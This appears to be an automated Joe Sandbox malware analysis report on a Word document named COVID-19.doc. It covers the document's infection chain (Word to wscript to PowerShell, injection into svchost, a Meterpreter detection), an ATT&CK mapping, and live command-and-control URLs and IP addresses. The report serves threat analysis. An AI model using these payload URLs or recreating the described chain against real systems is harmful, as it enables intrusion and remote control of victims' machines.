Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C20E8 GetVolumeInformationA,lstrlenA,wsprintfA,GetUserNameA,GetComputerNameA,
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality:

barindex
Yara detected MeterpreterShow sources
Source: Yara matchFile source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting53Windows Service1Windows Service1Scripting53OS Credential DumpingAccount Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection111Obfuscated Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery23SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSSecurity Software Discovery131Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsService Execution1Network Logon ScriptNetwork Logon ScriptMasquerading111LSA SecretsVirtualization/Sandbox Evasion4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaPowerShell3Rc.commonRc.commonVirtualization/Sandbox Evasion4Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection111DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 341993 Sample: COVID-19.doc Startdate: 20/01/2021 Architecture: WINDOWS Score: 100 67 Yara detected Meterpreter 2->67 69 Suspicious powershell command line found 2->69 71 May check the online IP address of the machine 2->71 73 8 other signatures 2->73 10 WINWORD.EXE 172 42 2->10         started        14 cmd.exe 2->14         started        16 svchost.exe 1 1 2->16         started        process3 dnsIp4 57 C:\Users\user\Desktop\COVID-19.tmp, ASCII 10->57 dropped 89 Document exploit detected (process start blacklist hit) 10->89 91 Suspicious javascript / visual basic script found (invalid extension) 10->91 19 wscript.exe 15 10->19         started        24 cmd.exe 1 14->24         started        59 127.0.0.1 unknown unknown 16->59 file5 signatures6 process7 dnsIp8 61 78.141.194.181, 49715, 49723, 80 AS-CHOOPAUS France 19->61 55 C:\Users\user\Desktop\COVID-19.ps1, Little-endian 19->55 dropped 75 System process connects to network (likely due to code injection or exploit) 19->75 26 powershell.exe 13 19->26         started        77 Wscript starts Powershell (via cmd or directly) 24->77 29 powershell.exe 58 24->29         started        31 conhost.exe 24->31         started        file9 signatures10 process11 signatures12 85 Suspicious powershell command line found 26->85 33 powershell.exe 23 26->33         started        35 conhost.exe 26->35         started        87 Found suspicious powershell code related to unpacking or dynamic code loading 29->87 37 svchost.exe 29->37         started        process13 dnsIp14 41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        45 cmd.exe 1 33->45         started        47 conhost.exe 33->47         started        63 45.67.229.125, 49724, 80 ALEXHOSTMD Moldova Republic of 37->63 65 ifconfig.me 216.239.32.21, 49725, 80 GOOGLEUS United States 37->65 79 System process connects to network (likely due to code injection or exploit) 37->79 81 Found evasive API chain (may stop execution after checking mutex) 37->81 83 Contains functionality to change the desktop window for a process (likely to hide graphical interactions) 37->83 signatures15 process16 process17 49 sc.exe 1 41->49         started        51 sc.exe 1 43->51         started        53 sc.exe 1 45->53         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
COVID-19.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
17.2.svchost.exe.4c0000.0.unpack100%AviraHEUR/AGEN.1112533Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://78.141.194.181/0%Avira URL Cloudsafe
http://78.141.194.181/s34987435987.txt0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://45.67.229.125/c7mnnlrmfut6g1erfewlxlxniyo.php0%Avira URL Cloudsafe
http://78.141.194.181/d569872345345.txt0%Avira URL Cloudsafe
http://78.141.194.181:80/s34987435987.txt0%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
http://78.141.194.181/s34987435987.txt757AE1B0%Avira URL Cloudsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://78.141.194.181/s34987435987.txtx0%Avira URL Cloudsafe
http://78.141.194.181/d56987230%Avira URL Cloudsafe
http://78.141.194.181/d569872345345.txt$$0%Avira URL Cloudsafe
http://78.141.194.181/s34987435987.txt7C:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ifconfig.me
216.239.32.21
truefalse
    high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://78.141.194.181/s34987435987.txttrue
    • Avira URL Cloud: safe
    unknown
    http://45.67.229.125/c7mnnlrmfut6g1erfewlxlxniyo.phptrue
    • Avira URL Cloud: safe
    unknown
    http://78.141.194.181/d569872345345.txttrue
    • Avira URL Cloud: safe
    unknown
    http://ifconfig.me//false
      high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://78.141.194.181/svchost.exe, 00000006.00000002.929375850.000001832207E000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
        high
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 00000006.00000002.929781703.0000018322330000.00000002.00000001.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpfalse
            high
            http://78.141.194.181:80/s34987435987.txtsvchost.exe, 00000006.00000002.929327170.0000018322066000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://78.141.194.181/s34987435987.txt757AE1Bsvchost.exe, 00000006.00000002.926379288.000001831CA3D000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://78.141.194.181/s34987435987.txtxpowershell.exe, 00000004.00000002.794647491.0000000004979000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://78.141.194.181/d5698723COVID-19.docfalse
              • Avira URL Cloud: safe
              unknown
              http://78.141.194.181/d569872345345.txt$$COVID-19.docfalse
              • Avira URL Cloud: safe
              unknown
              http://78.141.194.181/s34987435987.txt7C:edb.log.6.drfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.705342342.0000000004ED1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793030596.0000000004651000.00000004.00000001.sdmpfalse
                high
                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  78.141.194.181
                  unknownFrance
                  20473AS-CHOOPAUStrue
                  45.67.229.125
                  unknownMoldova Republic of
                  200019ALEXHOSTMDtrue
                  216.239.32.21
                  unknownUnited States
                  15169GOOGLEUSfalse

                  Private

                  IP
                  127.0.0.1

                  General Information

                  Joe Sandbox Version:31.0.0 Red Diamond
                  Analysis ID:341993
                  Start date:20.01.2021
                  Start time:10:29:56
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:COVID-19.doc
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Run name:Potential for more IOCs and behavior
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winDOC@30/27@1/4
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:
                  • Successful, ratio: 94.4% (good quality ratio 87.3%)
                  • Quality average: 81.3%
                  • Quality standard deviation: 29.2%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 104.43.139.144
                  • TCP Packets have been reduced to 100
                  • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, skypedataprdcolwus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 5108 because it is empty
                  • Execution Graph export aborted for target wscript.exe, PID 4248 because there are no executed function
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  10:31:05API Interceptor86x Sleep call for process: powershell.exe modified
                  10:31:42API Interceptor2x Sleep call for process: svchost.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  78.141.194.181COVID-19.docGet hashmaliciousBrowse
                  • 78.141.194.181/d569872345345.txt
                  216.239.32.21SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                  • www.newbharatbakery.com/isub/?E6A=o8h88w7XVdxJ1uTDCp2NNRsrvJTuuHH9IllpA/1CkKx1rkqoN6C5GfVTprRt41jTNm/GQOr9jg==&oPqLWR=dVbHu890-L10
                  SpreadSheets.exeGet hashmaliciousBrowse
                  • ipecho.net/plain
                  PO2364#FD21200.exeGet hashmaliciousBrowse
                  • www.skaizenpharma.com/p95n/?OVolpd=5FRBa94U2t0LNNIxEBtFHFm4QSzJU+Ps4gWlya5iW8k+rx7igyabcstI9kjJaJ0do6bGo58SHg==&lhv0-=H0DTRrWxUjUx2Z
                  1gEpBw4A95.exeGet hashmaliciousBrowse
                  • myexternalip.com/raw
                  SecuriteInfo.com.Trojan.Packed.140.27461.exeGet hashmaliciousBrowse
                  • ipecho.net/plain
                  SecuriteInfo.com.BehavesLike.Win32.Trickbot.gm.exeGet hashmaliciousBrowse
                  • myexternalip.com/raw
                  vJHWQgfJ23.exeGet hashmaliciousBrowse
                  • myexternalip.com/raw
                  25.12.2020_Bel26.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.74/country
                  25.12.2020_Bel82.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.74/country
                  Bel_61.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.74/country
                  JP8MnQgsOD.exeGet hashmaliciousBrowse
                  • ipinfo.io/ip
                  30.11.2020_Pazartesi_51.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.25/country
                  30.11.2020_Pazartesi_51.docxGet hashmaliciousBrowse
                  • ipinfo.io/84.17.52.25/country
                  EME_PO.39134.xlsxGet hashmaliciousBrowse
                  • www.fountaintriokc.com/mz59/?VrGd-0=QwUSBIuSE+Ofv6f/rqUdjwp6IkOfWoNuaQrUy5Rb/p4HOL6Y01yqVfQosEMy3LhwXy2Auw==&MDKtU=Jxotsl4pOvw
                  sP6iCH7OJG.exeGet hashmaliciousBrowse
                  • ipinfo.io/json
                  cQ8245rmPr.exeGet hashmaliciousBrowse
                  • myexternalip.com/raw
                  EnkIyRDCVr.exeGet hashmaliciousBrowse
                  • ipecho.net/plain
                  ciechgroup-551288_xls.HtMlGet hashmaliciousBrowse
                  • svgur.com/i/G6D.svg
                  IeMWyHq3i0.exeGet hashmaliciousBrowse
                  • ipinfo.io/ip
                  c7.xlsmGet hashmaliciousBrowse
                  • ipinfo.io/json

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  ifconfig.meobaphx.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  obaphx.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  mmhXZ5ovM9.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  PO23294248429.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  CECn9xwtYd.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  Purchase Order.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  http://UeR.ReiyKiQ.ir/download.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  http://ero.bckl.ir/download.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  key.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  4ae27e2f7dc64cGet hashmaliciousBrowse
                  • 216.239.32.21
                  d118cec4f2e457Get hashmaliciousBrowse
                  • 216.239.32.21
                  e0f63b5d4abf7dGet hashmaliciousBrowse
                  • 216.239.32.21
                  COMPANY PROFILE.docGet hashmaliciousBrowse
                  • 216.239.32.21
                  http://kecforging.com/products/cara.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  Product Specifications.docGet hashmaliciousBrowse
                  • 216.239.32.21
                  INQ No REF1500-2019.docGet hashmaliciousBrowse
                  • 216.239.32.21
                  6cea111a5979b9Get hashmaliciousBrowse
                  • 216.239.32.21
                  2be662ee79084035914e9d6a6d6be10d.pngGet hashmaliciousBrowse
                  • 216.239.32.21
                  35Requst for Quote.exeGet hashmaliciousBrowse
                  • 216.239.32.21

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  GOOGLEUSim.vector.app.apkGet hashmaliciousBrowse
                  • 172.217.20.234
                  Payment list.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  2021 DOCS.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  0f9zzITIbk.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  inquiry PR11020204168.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  insz.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  RE.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  4892.htmGet hashmaliciousBrowse
                  • 172.217.22.225
                  _#Ud83d#Udcde_frances@viaseating.com.htmGet hashmaliciousBrowse
                  • 34.87.210.235
                  4892.htmGet hashmaliciousBrowse
                  • 142.250.180.161
                  SecuriteInfo.com.Trojan.PackedNET.509.28611.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  SecuriteInfo.com.Trojan.PackedNET.509.17348.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  demo.jsGet hashmaliciousBrowse
                  • 142.250.180.161
                  demo.jsGet hashmaliciousBrowse
                  • 142.250.180.161
                  Details...exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  PO-RY 001-21 Accuri.jarGet hashmaliciousBrowse
                  • 34.102.136.180
                  NEW AGREEMENT 19 01 2021.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  Release Pending messages on account.htmlGet hashmaliciousBrowse
                  • 142.250.180.161
                  Soa.docGet hashmaliciousBrowse
                  • 34.102.136.180
                  9oUx9PzdSA.exeGet hashmaliciousBrowse
                  • 34.89.33.35
                  AS-CHOOPAUSCOVID-19.docGet hashmaliciousBrowse
                  • 78.141.194.181
                  insz.exeGet hashmaliciousBrowse
                  • 141.164.40.157
                  9oUx9PzdSA.exeGet hashmaliciousBrowse
                  • 207.246.80.14
                  3KvCNpcQ6tvwKr5.exeGet hashmaliciousBrowse
                  • 45.76.199.220
                  Details for bookings.exeGet hashmaliciousBrowse
                  • 107.191.37.252
                  CQcT4Ph03Z.exeGet hashmaliciousBrowse
                  • 137.220.48.181
                  Details here.exeGet hashmaliciousBrowse
                  • 107.191.37.252
                  Carta de pago.exeGet hashmaliciousBrowse
                  • 207.148.72.173
                  SCAN_20210115140930669.exeGet hashmaliciousBrowse
                  • 139.180.142.220
                  EED7.exeGet hashmaliciousBrowse
                  • 207.246.80.14
                  G4Q6P4rcer.exeGet hashmaliciousBrowse
                  • 137.220.48.181
                  XdzlrPkDsI.exeGet hashmaliciousBrowse
                  • 136.244.98.158
                  fil1Get hashmaliciousBrowse
                  • 66.42.126.73
                  Mv Tiger Flame.xlsxGet hashmaliciousBrowse
                  • 137.220.48.181
                  J0OmHIagw8.exeGet hashmaliciousBrowse
                  • 45.77.226.209
                  DTwcHU5qyI.exeGet hashmaliciousBrowse
                  • 137.220.48.181
                  4wCFJMHdEJ.exeGet hashmaliciousBrowse
                  • 45.32.95.179
                  BSL 21 PYT.xlsxGet hashmaliciousBrowse
                  • 137.220.48.181
                  20210111140930669.exeGet hashmaliciousBrowse
                  • 139.180.142.220
                  H56P7iDwnJ.docGet hashmaliciousBrowse
                  • 207.148.24.55
                  ALEXHOSTMDYuDMWyldWb.exeGet hashmaliciousBrowse
                  • 176.123.10.30
                  Request for Quotation_1-06-21__dutchmen_ #25288_excelelx.exeGet hashmaliciousBrowse
                  • 45.67.229.38
                  OVl2ydWZDbGet hashmaliciousBrowse
                  • 213.226.100.140
                  eTrader-0.1.0.exeGet hashmaliciousBrowse
                  • 213.226.100.140
                  eTrader-0.1.0.exeGet hashmaliciousBrowse
                  • 213.226.100.140
                  update_2021-01-02_17-23.exeGet hashmaliciousBrowse
                  • 176.123.6.176
                  OhGodAnETHlargementPill.sfx.exeGet hashmaliciousBrowse
                  • 45.67.229.182
                  o5oNiZzC2b.exeGet hashmaliciousBrowse
                  • 176.123.6.176
                  OCC-221220-TBU1XAT7X4.xlsGet hashmaliciousBrowse
                  • 45.142.212.128
                  xTWBTe8Yz3.exeGet hashmaliciousBrowse
                  • 176.123.2.251
                  xG4rjYxzCT.dllGet hashmaliciousBrowse
                  • 45.67.229.97
                  svhost.ps1Get hashmaliciousBrowse
                  • 176.123.8.228
                  SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                  • 176.123.0.55
                  IW2g2rzW9x.exeGet hashmaliciousBrowse
                  • 176.123.9.138
                  http://www.4413044130.stormletpet.com./UEt1c3RAc29mdHNvdXJjZS5jby5ueg==#aHR0cHM6Ly9vaGlzLm5nL29mZmljZS9vZjI/L1BLdXN0QHNvZnRzb3VyY2UuY28ubno=Get hashmaliciousBrowse
                  • 176.123.0.55
                  OrM0pS5PdK.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  hffMSxRxrO.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  uUYx0SUnV5.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  jocniwuamG.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  v3ARXpc5fv.exeGet hashmaliciousBrowse
                  • 45.67.229.13

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

